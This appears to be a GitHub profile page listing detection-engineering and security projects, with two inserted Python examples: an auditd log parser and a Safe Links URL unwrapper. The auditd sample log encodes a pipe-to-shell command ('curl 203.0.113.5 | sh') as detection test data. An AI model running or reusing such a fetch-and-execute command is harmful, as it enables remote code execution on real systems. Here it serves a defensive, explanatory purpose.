Brendan Chamberlain's Projects
A detection engineering-specific variant of Advent of Code.
Small and highly portable detection tests based on MITRE's ATT&CK.
Web app that provides basic navigation and annotation of ATT&CK matrices
Python CLI for normalizing, aggregating, and decoding auditd logs.
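Added example (not the project's own code) of the three operations that description names, applied to a constructed auditd excerpt: each `type=... msg=audit(ts:serial): k=v ...` record is normalized to a dict, the records sharing one serial are aggregated into a single event, and hex-encoded string fields (auditd hex-encodes values containing whitespace, quotes or control characters and emits them unquoted in uppercase hex) are decoded. The set of fields treated as decodable strings is this example's assumption; note that `a0..aN` are argv strings only in EXECVE records and raw register values in SYSCALL records, so they must not be decoded there.

```python
import re

RECORD_RE = re.compile(
    r"^type=(?P<type>\S+)\s+msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):\s*(?P<body>.*)$"
)
# key=value pairs; values are a double-quoted string, a single-quoted nested
# message (USER_* records), or a bare token (numbers, hex blobs, "(null)").
KV_RE = re.compile(r"(\w+)=(\"[^\"]*\"|'[^']*'|\S+)")
# auditd hex-encodes with uppercase digits; SYSCALL register values are lowercase.
HEX_RE = re.compile(r"^(?:[0-9A-F]{2})+$")

# Fields whose unquoted hex value is an encoded string (assumption: common cases).
STRING_FIELDS = {"proctitle", "cwd", "exe", "comm", "name", "key", "dir", "acct"}
ARG_FIELD_RE = re.compile(r"^a\d+$")


def decode_value(rtype, field, raw):
    """Strip quotes from quoted values; hex-decode encoded string fields."""
    if raw[:1] in ('"', "'"):
        return raw[1:-1]
    is_string_field = field in STRING_FIELDS or (
        rtype == "EXECVE" and ARG_FIELD_RE.match(field)
    )
    if is_string_field and HEX_RE.match(raw):
        text = bytes.fromhex(raw).decode("utf-8", "replace")
        return text.replace("\x00", " ")  # proctitle separates argv with NUL
    return raw


def parse_record(line):
    """Normalize one auditd line into a dict, or None if it is not a record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    rtype = m.group("type")
    fields = {k: decode_value(rtype, k, v) for k, v in KV_RE.findall(m.group("body"))}
    return {
        "type": rtype,
        "timestamp": float(m.group("ts")),
        "serial": int(m.group("serial")),
        "fields": fields,
    }


def aggregate(lines):
    """Group records by serial into events; fields are namespaced by record type
    so that e.g. syscall.a0 and execve.a0 do not collide."""
    events = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        ev = events.setdefault(
            rec["serial"],
            {"serial": rec["serial"], "timestamp": rec["timestamp"], "types": [], "fields": {}},
        )
        ev["types"].append(rec["type"])
        prefix = rec["type"].lower()
        for k, v in rec["fields"].items():
            ev["fields"][f"{prefix}.{k}"] = v
    return list(events.values())


# Constructed sample: one execve event spread over four records, plus one
# unrelated login record. a2 and proctitle are the hex encodings of
# "curl 203.0.113.5 | sh" and "sh\0-c\0curl 203.0.113.5 | sh".
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.123:4242): arch=c000003e syscall=59 success=yes exit=0 a0=55d1c0a0 a1=55d1c0b0 a2=55d1c0c0 a3=0 items=2 ppid=1000 pid=1001 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1700000000.123:4242): argc=3 a0="sh" a1="-c" a2=6375726C203230332E302E3131332E35207C207368
type=CWD msg=audit(1700000000.123:4242): cwd="/home/user"
type=PROCTITLE msg=audit(1700000000.123:4242): proctitle=7368002D63006375726C203230332E302E3131332E35207C207368
type=USER_LOGIN msg=audit(1700000001.500:4243): pid=900 uid=0 auid=1000 ses=4 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=198.51.100.7 addr=198.51.100.7 terminal=/dev/pts/1 res=success'
"""

if __name__ == "__main__":
    for ev in aggregate(SAMPLE_LOG.splitlines()):
        print(ev["serial"], ev["types"])
        for k, v in sorted(ev["fields"].items()):
            print(f"  {k} = {v}")
```

Running it shows why the decoding matters for detection: the pipe-to-shell command is invisible in the raw EXECVE line and only appears once `a2` and `proctitle` are hex-decoded, and only the per-serial aggregation puts the command together with the `cwd`, `exe` and `auid` from the sibling records.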
😎 Awesome lists about all kinds of interesting topics
Detection Engineering is a tactical function of a cybersecurity defense program that involves the design, implementation, and operation of detective controls with the goal of proactively identifying malicious or unauthorized activity before it negatively impacts an individual or an organization.
A curated list of awesome Python frameworks, libraries, software and resources
A curated list of awesome threat detection and hunting resources
Bitnami Docker Image for MediaWiki
Check and submit Blue Coat WebPulse website classifications.
This repository contains all Demisto content and from here we share content updates
An example of how to deploy a Detection as Code pipeline using Sigma rules, Sigmac, GitLab CI, and Splunk.
A PowerShell script for remotely disabling active Windows 10/2016 device network interfaces.
Splunk Docker GitHub Repository
Fast Incident Response
Full stack, modern web application template. Using FastAPI, React, SQLModel, PostgreSQL, Docker, GitHub Actions, automatic HTTPS and more.
Galah: an LLM-powered web honeypot using the OpenAI API.
A Python CLI utility for quickly converting a list or text file of MITRE ATT&CK technique IDs to a MITRE ATT&CK Navigator layer .JSON file.
12 Lessons, Get Started Building with Generative AI 🔗 https://microsoft.github.io/generative-ai-for-beginners/
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages
Tool to extract indicators of compromise from security reports in PDF format
Python module/cli to get public IP address using ipify's free API.
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
Shows the relevant part of NPM module's README file right in your terminal
A python module for working with ATT&CK
Python script that normalizes a URL that has been rewritten by Microsoft ATP SafeLink protection.
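Added example (not the project's own code) of the normalization that description refers to. Safe Links rewrites a message's links to `https://<region>.safelinks.protection.outlook.com/?url=<percent-encoded original>&data=...&sdata=...&reserved=0`, so the original destination is recovered by parsing the `url` query parameter; everything else here (the sample URLs, the hypothetical `unwrap_safelink` name, the nesting limit) is this example's construction. Percent-decoding is applied exactly once, so the original URL's own encoding is preserved, and wrappers are peeled repeatedly because a message relayed through several tenants can be rewritten more than once.

```python
from urllib.parse import parse_qs, quote, urlparse

SAFELINKS_SUFFIX = ".safelinks.protection.outlook.com"


def is_safelink(url: str) -> bool:
    """True when the host is a Safe Links redirector (suffix match on the
    hostname, so a look-alike such as safelinks.protection.outlook.com.evil.test
    does not qualify)."""
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(SAFELINKS_SUFFIX)


def unwrap_safelink(url: str, max_depth: int = 5) -> str:
    """Return the original destination of a Safe Links-rewritten URL.

    Non-Safe Links URLs are returned unchanged. parse_qs percent-decodes the
    parameter once, which is exactly the decoding Safe Links applied, so the
    destination's own query-string encoding survives intact.
    """
    for _ in range(max_depth):
        if not is_safelink(url):
            return url
        params = parse_qs(urlparse(url).query)
        target = params.get("url")
        if not target or not target[0]:
            raise ValueError("Safe Links URL without a url= parameter")
        url = target[0]
    raise ValueError(f"more than {max_depth} nested Safe Links wrappers")


# Constructed sample: an invented destination whose own query string is
# percent-encoded (%2F), wrapped once by Safe Links and then wrapped again.
ORIGINAL = "https://example.com/login?next=%2Faccount"
WRAPPED = (
    "https://nam02.safelinks.protection.outlook.com/?url="
    + quote(ORIGINAL, safe="")
    + "&data=05%7C01%7Cuser%40example.org%7Cabc123&sdata=abc%3D&reserved=0"
)
NESTED = (
    "https://eur01.safelinks.protection.outlook.com/?url="
    + quote(WRAPPED, safe="")
    + "&reserved=0"
)

if __name__ == "__main__":
    print(unwrap_safelink(WRAPPED))
    print(unwrap_safelink(NESTED))
```

Feeding the unwrapped destination, rather than the redirector, into threat-intel lookups and URL detections is the point of the normalization: otherwise every phishing link in a protected tenant resolves to the same Microsoft hostname.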